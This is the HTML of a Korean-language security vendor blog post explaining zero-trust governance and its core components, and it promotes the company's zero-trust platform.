&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384089 (1).png&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;1024&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/df8sCn/dJMcaaYrNYr/vkWckxVz403C4h7WKawrk1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/df8sCn/dJMcaaYrNYr/vkWckxVz403C4h7WKawrk1/img.png&quot; data-alt=&quot;[이미지] 제로트러스트 거버넌스 개념도&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/df8sCn/dJMcaaYrNYr/vkWckxVz403C4h7WKawrk1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fdf8sCn%2FdJMcaaYrNYr%2FvkWckxVz403C4h7WKawrk1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1024&quot; height=&quot;1024&quot; data-filename=&quot;Group 2034384089 (1).png&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;1024&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 제로트러스트 거버넌스 개념도&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #009a87;&quot;&gt;제로트러스트는 특정 기술이나 영역이 아니라,&amp;nbsp;모든 보안 영역을 정책과 의사결정 체계로 통제하는&amp;nbsp;운영 중심의 보안 거버넌스 모델입니다&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;거버넌스는 단순한 관리 체계가 아닙니다. 제로트러스트 환경에서 거버넌스는 다음 질문에 대한 명확한 답을 포함해야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 어떤 기준으로 접근을 허용하거나 차단하는가&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 정책은 누가 정의하고, 변경 권한과 책임은 어떻게 관리되는가&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 사고 발생 시 판단과 대응은 자동화되어 있는가&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 모든 결정과 행위는 감사 가능한 형태로 남는가&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;즉, &lt;b&gt;제로트러스트는 보안 기술의 집합이 아니라 보안 의사결정 구조의 전환&lt;/b&gt;입니다. 기술만 도입하고 거버넌스가 없다면, 제로트러스트는 복잡한 보안 환경과 책임이 불분명한 운영으로 이어질 수밖에 없습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt; &lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;제로트러스트 환경에서 거버넌스가 달라져야 하는 이유&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384090.png&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cGTQDo/dJMcabJQUWG/ULhJi7NV4ZAPbkP1SSTETk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cGTQDo/dJMcabJQUWG/ULhJi7NV4ZAPbkP1SSTETk/img.png&quot; data-alt=&quot;[이미지] 기존 보안과 제로트러스트 거버넌스 비교&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cGTQDo/dJMcabJQUWG/ULhJi7NV4ZAPbkP1SSTETk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcGTQDo%2FdJMcabJQUWG%2FULhJi7NV4ZAPbkP1SSTETk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1536&quot; height=&quot;1024&quot; data-filename=&quot;Group 2034384090.png&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 기존 보안과 제로트러스트 거버넌스 비교&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;1. 신뢰의 단위가 '네트워크'에서 '행위'로 이동&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;기존 보안은 '사내망에 들어왔는가'를 기준으로 신뢰를 부여했습니다. 그러나 재택근무, 클라우드, 외주 협업이 일상화된 지금, 네트워크 위치는 더 이상 신뢰의 기준이 될 수 없습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제로트러스트 거버넌스는&lt;b&gt; 사용자&amp;middot;디바이스&amp;middot;행위&amp;middot;맥락(Context)&lt;/b&gt;을 기준으로 접근을 판단합니다. 이 기준을 누가 어떻게 정의하고 운영하는지가 곧 기업의 보안 수준을 좌우합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;예를 들어,&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 특정 사용자가 비정상적인 시간대에 민감 데이터에 접근하려 할 때&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 새로운 디바이스에서 처음 로그인을 시도할 때&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 평소와 다른 지역에서 접근 요청이 발생할 때&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이러한 상황에서 &lt;u&gt;허용할 것인가, 추가 인증을 요구할 것인가, 차단할 것인가&lt;/u&gt;를 &lt;b&gt;결정하는 기준&lt;/b&gt;이 바로 거버넌스입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&amp;nbsp;2. 정책 중심 보안으로의 전환&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;솔루션이 많아질수록 보안이 강해지는 것은 아닙니다. 각 솔루션이 서로 다른 기준과 정책으로 동작하면, 오히려 운영 복잡성과 관리 부담이 증가합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제로트러스트 거버넌스에서는 모든 보안 통제가 정책을 중심으로 통합됩니다. 엔드포인트 보안 정책, 네트워크 접근 정책, 데이터 접근 권한 정책, 인증 강도 정책이 하나의 체계 안에서 일관되게 적용되고, 변경 이력과 검토 기록이 명확히 관리되어야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;3. '탐지'에서 '운영'까지 이어지는 책임 구조&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;보안 사고의 상당수는 탐지 실패가 아니라 대응 지연과 책임 불명확에서 발생합니다. 이상 행위가 탐지되었음에도 누가 확인하고, 누가 조치하며, 어떤 기준으로 판단하는지가 명확하지 않다면 사고는 확대될 수밖에 없습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제로트러스트 거버넌스는 탐지 이후의 대응, 격리, 권한 회수, 재평가까지를 하나의 운영 흐름으로 묶습니다. 이는 사람의 판단에만 의존하지 않는 운영 자동화 체계를 전제로 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt; &lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;제로트러스트 거버넌스를 구성하는 핵심 요소&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제로트러스트를 선언이 아닌 실제 운영 체계로 만들기 위해서는 다음 요소들이 유기적으로 연결되어야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;  정책 엔진(Policy Engine)&lt;/b&gt;: &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&amp;nbsp; 사용자&amp;middot;디바이스&amp;middot;리스크 기반 접근 정책 정의, 동적 제어 규칙과 변경 이력 관리&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;  가시성(Visibility)&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&amp;nbsp; 모든 접근과 행위에 대한 실시간 모니터링과 이상 징후 기준선 설정&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;  통합 로그 및 감사 체계(Audit &amp;amp; Compliance)&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&amp;nbsp; 모든 보안 의사결정의 추적 가능성과 규제 대응을 위한 기록 관리&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;  자동 대응 메커니즘(Automated Response)&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&amp;nbsp; 이상 행위 발생 시 즉각적인 정책 기반 통제와 격리&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;  중앙 관리 구조(Centralized Management)&lt;/b&gt;: &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&amp;nbsp; 단일 콘솔에서의 정책 관리와 전사 보안 현황 가시화&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이 중 하나라도 빠진다면, 제로트러스트는 선언적 구호에 그치게 됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;이스트시큐리티, 제로트러스트를 '운영 가능한 구조'로 만들다&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이스트시큐리티는 제로트러스트를 엔드포인트 보안 중심의 통합 거버넌스 모델로 접근합니다. 단일 기술이나 제품이 아니라, 정책&amp;middot;탐지&amp;middot;대응&amp;middot;감사를 하나의 흐름으로 연결하는 것이 핵심입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이를 기반으로 설계된 제로트러스트 통합 보안 플랫폼, &lt;a href=&quot;https://www.estsecurity.com/enterprise/product/alyac-zepp&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;b&gt;알약 ZePP&lt;/b&gt;&lt;/a&gt;는 다음과 같은 방향성을 갖습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333;&quot;&gt;  &lt;b&gt;엔드포인트 행위 기반 위협 탐지와 단말 신뢰도 평가&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333;&quot;&gt; &lt;b&gt; FIDO2 기반 다중 인증과 정책 중심 접근 제어&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333;&quot;&gt;  &lt;b&gt;XDR 기반 이벤트 연계를 통한 맥락 중심 보안 분석&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333;&quot;&gt;  &lt;b&gt;모든 보안 의사결정 이력의 중앙 관리와 감사 대응&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이는 '보안을 잘 하고 있는가?'라는 질문에 직관이 아닌 데이터와 정책으로 답할 수 있는 구조를 만드는 데 목적이 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384091.png&quot; data-origin-width=&quot;2670&quot; data-origin-height=&quot;1404&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cuSBRm/dJMcahQOhMB/qAPaszwcKkWj3nYPWHFJW1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cuSBRm/dJMcahQOhMB/qAPaszwcKkWj3nYPWHFJW1/img.png&quot; data-alt=&quot;[이미지] 알약 ZePP 제로트러스트 아키텍처&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cuSBRm/dJMcahQOhMB/qAPaszwcKkWj3nYPWHFJW1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcuSBRm%2FdJMcahQOhMB%2FqAPaszwcKkWj3nYPWHFJW1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2670&quot; height=&quot;1404&quot; data-filename=&quot;Group 2034384091.png&quot; data-origin-width=&quot;2670&quot; data-origin-height=&quot;1404&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 알약 ZePP 제로트러스트 아키텍처&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt; &lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;제로트러스트의 완성은 '도입'이 아니라 '성숙도'입니다&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제로트러스트는 한 번에 완성되지 않습니다. 중요한 것은 얼마나 많은 기술을 도입했는가가 아니라, &lt;b&gt;보안 의사결정이 얼마나 체계적으로 관리되고 있는가&lt;/b&gt;입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;거버넌스가 없는 제로트러스트는 아래와 같은 보안 취약점으로 이어질 수 밖에 없습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;i&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;복잡한 보안 환경&lt;/span&gt;&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;i&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;책임이 불분명한 운영&lt;/span&gt;&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;i&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;사고 이후에야 드러나는 취약점&lt;/span&gt;&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이제 제로트러스트는 선택 가능한 기술 트렌드가 아니라, 기업 보안 성숙도를 판단하는 기준이 되고 있습니다. 그리고 그 중심에는 언제나 거버넌스가 자리하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
